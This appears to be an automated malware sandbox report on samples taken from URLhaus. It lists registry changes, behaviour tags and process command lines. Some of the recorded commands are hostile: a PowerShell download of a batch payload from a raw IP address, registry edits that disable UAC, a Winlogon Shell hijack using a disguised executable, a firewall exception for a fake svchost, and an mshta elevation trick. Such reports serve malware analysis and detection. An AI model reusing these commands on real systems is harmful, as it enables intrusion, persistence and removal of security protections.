| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5} | C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024" | C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = d20de67af3c8613f60eb5e1827463522feaf35eeeeef2f258ba3d2055017810f076911ebb8d1afea1c84c804050f931dee18e328257912f1081cf2c7f12d401526cd10c6cf962825921bdf | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772324680587466" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr = 537d567366087c6658524c17525304175142701eb36b | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Ammyy | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SoftwareSASGeneration = "1" | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
"C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe"
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe
"C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe"
C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"
C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5076 -ip 5076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 536
C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe
"C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe"
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffb26c2cc40,0x7ffb26c2cc4c,0x7ffb26c2cc58
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe" -service -lunch
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2428 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4500 /prefetch:1
C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 9
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4860,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4936 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 9 > nul && copy "C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe" "C:\Users\Admin\Music\Windows Security Health Host.exe" && ping 127.0.0.1 -n 9 > nul && "C:\Users\Admin\Music\Windows Security Health Host.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 9
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5108 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4484,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4652 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4632,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:2
C:\Users\Admin\Downloads\UrlHausFiles\unik.exe
"C:\Users\Admin\Downloads\UrlHausFiles\unik.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xdc,0x100,0x104,0x7c,0x108,0x7ffb26c346f8,0x7ffb26c34708,0x7ffb26c34718
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 9
C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
"C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe"
C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe
"C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe"
C:\Users\Admin\Music\Windows Security Health Host.exe
"C:\Users\Admin\Music\Windows Security Health Host.exe"
C:\Users\Admin\Music\Windows Security Health Host.exe
"C:\Users\Admin\Music\Windows Security Health Host.exe"
C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe
"C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4fc 0x2ec
C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe
"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7848.tmp\7849.tmp\784A.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE
"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7A1D.tmp\7A1E.tmp\7A1F.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb265946f8,0x7ffb26594708,0x7ffb26594718
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
